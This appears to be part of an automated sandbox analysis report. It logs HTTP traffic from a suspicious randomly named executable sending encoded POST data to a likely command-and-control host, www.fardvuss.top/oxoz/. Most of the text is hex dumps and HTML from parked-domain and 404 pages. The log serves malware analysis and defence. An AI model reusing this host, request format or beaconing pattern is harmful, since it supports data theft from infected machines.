                                                          Data Raw: 37 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 67 6f 6f 64 67 69 66 74 67 75 72 75 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 [TRUNCATED]
                                                          Data Ascii: 797<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>goodgiftguru.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/ [TRUNCATED]
                                                          Sep 11, 2024 22:02:49.639919043 CEST903INData Raw: 67 6f 6f 64 67 69 66 74 67 75 72 75 2e 63 6f 6d 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 67 6f 6f 64 67 69 66 74 67 75 72 75 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20
                                                          Data Ascii: goodgiftguru.com"><strong>View the WHOIS results of goodgiftguru.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Pa
                                                          Sep 11, 2024 22:02:49.639949083 CEST5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.1049709199.192.19.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:04.998111963 CEST722OUTPOST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 37 76 33 38 6d 61 43 50 57 36 75 62 44 48 4f 2b 4b 37 6c 44 43 72 49 75 6f 47 63 44 78 38 35 68 6d 4a 6d 61 36 4f 59 4f 6c 4d 4b 48 55 41 75 70 59 4e 6a 6f 44 52 50 6e 67 75 34 37 51 69 59 6d 64 71 79 34 61 75 5a 72 49 52 4e 7a 70 36 73 42 5a 6d 6b 42 4c 74 48 4c 49 36 49 58 42 56 55 55 55 71 72 67 51 63 31 47 58 4b 5a 6c 58 35 70 39 58 6d 54 44 66 41 4b 66 46 35 35 59 52 46 75 70 48 34 6e 64 53 31 69 78 37 4a 47 38 34 51 30 6c 63 41 76 43 4a 39 37 41 4a 65 4d 2f 57 72 6e 79 37 4f 32 67 78 74 6d 32 6b 58 48 5a 49 4c 6d 4d 66 47 68 62 75 6d 70 76 66 52 34 73
                                                          Data Ascii: bFGXGTdX=7v38maCPW6ubDHO+K7lDCrIuoGcDx85hmJma6OYOlMKHUAupYNjoDRPngu47QiYmdqy4auZrIRNzp6sBZmkBLtHLI6IXBVUUUqrgQc1GXKZlX5p9XmTDfAKfF55YRFupH4ndS1ix7JG84Q0lcAvCJ97AJeM/Wrny7O2gxtm2kXHZILmMfGhbumpvfR4s
                                                          Sep 11, 2024 22:03:05.636337996 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:05 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                          Sep 11, 2024 22:03:05.636368036 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                          Sep 11, 2024 22:03:05.636382103 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                          Sep 11, 2024 22:03:05.636488914 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                          Sep 11, 2024 22:03:05.636502981 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                                          Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                                          Sep 11, 2024 22:03:05.636518002 CEST1120INData Raw: 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20
                                                          Data Ascii: 719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1="406.967" x2="1
                                                          Sep 11, 2024 22:03:05.636533022 CEST1236INData Raw: 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20
                                                          Data Ascii: "7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stro
                                                          Sep 11, 2024 22:03:05.636548996 CEST1236INData Raw: 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 53 6d 61 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                                                          Data Ascii: </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx=
                                                          Sep 11, 2024 22:03:05.636620998 CEST1236INData Raw: 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 6c 2d 36 34 2e 37 32 36 2d 31 37 2e 33 35 33 63 2d 31 31 2e 30 38 36 2d 32 2e 39 37 32 2d 31 37 2e 36 36 34 2d 31 34 2e 33 36
                                                          Data Ascii: -miterlimit="10" d="M338.164,454.689l-64.726-17.353c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.08
                                                          Sep 11, 2024 22:03:05.636636019 CEST672INData Raw: 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 63 35 2e 32 33 34 2d 33 2e 30 33 39 2c 37 2e 37 33 31 2d 38 2e 39 36 36 2c 36 2e
                                                          Data Ascii: stroke-miterlimit="10" d="M388.762,434.677c5.234-3.039,7.731-8.966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.0
                                                          Sep 11, 2024 22:03:05.641469955 CEST1236INData Raw: 36 38 35 2d 35 2e 35 36 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: 685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M241.978,395.324c-3.012-5.25-2.209-11.631,1.518-15.977c-2.701


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.1049710199.192.19.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:07.863334894 CEST746OUTPOST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 37 76 33 38 6d 61 43 50 57 36 75 62 43 6d 2b 2b 49 61 6c 44 46 4c 49 68 6e 6d 63 44 6e 4d 35 74 6d 4a 71 61 36 4c 34 65 6c 65 75 48 55 68 65 70 5a 50 4c 6f 45 52 50 6e 34 65 35 7a 50 79 59 58 64 71 2b 77 61 73 39 72 49 52 5a 7a 70 2b 67 42 5a 33 6b 43 4a 39 48 46 41 61 49 5a 46 56 55 55 55 71 72 67 51 63 77 6a 58 4d 78 6c 58 4e 74 39 57 48 54 4d 65 41 4c 74 4d 5a 35 59 56 46 75 74 48 34 6d 49 53 32 6d 4c 37 4c 2b 38 34 52 45 6c 53 79 4c 46 63 4e 37 43 47 2b 4e 38 62 6f 65 48 2b 76 61 54 37 2b 7a 32 34 58 4c 4d 50 71 48 4c 4f 58 41 4d 39 52 31 68 52 58 4e 47 4c 38 4c 68 70 69 30 65 68 4f 6c 5a 53 39 64 64 74 45 76 30 56 67 3d 3d
                                                          Data Ascii: bFGXGTdX=7v38maCPW6ubCm++IalDFLIhnmcDnM5tmJqa6L4eleuHUhepZPLoERPn4e5zPyYXdq+was9rIRZzp+gBZ3kCJ9HFAaIZFVUUUqrgQcwjXMxlXNt9WHTMeALtMZ5YVFutH4mIS2mL7L+84RElSyLFcN7CG+N8boeH+vaT7+z24XLMPqHLOXAM9R1hRXNGL8Lhpi0ehOlZS9ddtEv0Vg==
                                                          Sep 11, 2024 22:03:08.480758905 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:08 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                          Sep 11, 2024 22:03:08.480775118 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                          Sep 11, 2024 22:03:08.480792999 CEST448INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                          Sep 11, 2024 22:03:08.480806112 CEST1236INData Raw: 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30 37 22 20 79 32 3d 22 32 36 36 2e 35 38 31 22
                                                          Data Ascii: erlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="508.129" y1="255
                                                          Sep 11, 2024 22:03:08.480817080 CEST1236INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 30 30 2e 36 37 22 20 79 31 3d 22
                                                          Data Ascii: stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                          Sep 11, 2024 22:03:08.480833054 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <line fill="none"
                                                          Sep 11, 2024 22:03:08.480844021 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                                          Sep 11, 2024 22:03:08.480855942 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                                          Sep 11, 2024 22:03:08.480866909 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                                          Sep 11, 2024 22:03:08.480879068 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                          Sep 11, 2024 22:03:08.485847950 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.1049711199.192.19.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:10.403425932 CEST1759OUTPOST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 37 76 33 38 6d 61 43 50 57 36 75 62 43 6d 2b 2b 49 61 6c 44 46 4c 49 68 6e 6d 63 44 6e 4d 35 74 6d 4a 71 61 36 4c 34 65 6c 65 6d 48 55 54 47 70 66 75 4c 6f 46 52 50 6e 6d 75 35 79 50 79 59 77 64 75 53 30 61 73 41 55 49 53 68 7a 37 72 38 42 49 7a 34 43 41 39 48 46 43 61 49 55 42 56 56 41 55 71 37 73 51 63 67 6a 58 4d 78 6c 58 4d 64 39 53 57 54 4d 54 67 4b 66 46 35 35 55 52 46 75 46 48 34 2b 59 53 33 53 62 34 37 65 38 34 78 55 6c 51 41 54 46 41 64 37 45 46 2b 4e 65 62 70 69 75 2b 72 43 6c 37 39 75 72 34 56 62 4d 4d 4e 43 6b 54 47 46 56 71 51 46 63 64 51 35 39 42 70 6e 78 6e 32 64 74 33 73 46 59 49 63 51 70 74 33 36 78 43 35 2b 6f 30 4c 30 34 48 65 65 53 75 6a 4a 4b 55 75 39 49 6f 35 72 42 7a 46 6b 49 4e 2f 68 4e 75 63 68 68 48 43 56 36 78 37 59 71 69 74 4b 4e 4c 46 44 50 36 53 36 2f 76 4c 77 44 34 4b 36 4e 54 6c 44 37 78 52 6e 30 6e 66 35 45 37 37 4f 43 32 4b 34 47 62 71 31 52 75 65 48 32 31 2b 76 35 6f 6e 77 31 45 45 79 74 31 4c 33 6f 41 51 4b 6a 56 42 32 62 4c 49 49 46 4a [TRUNCATED]
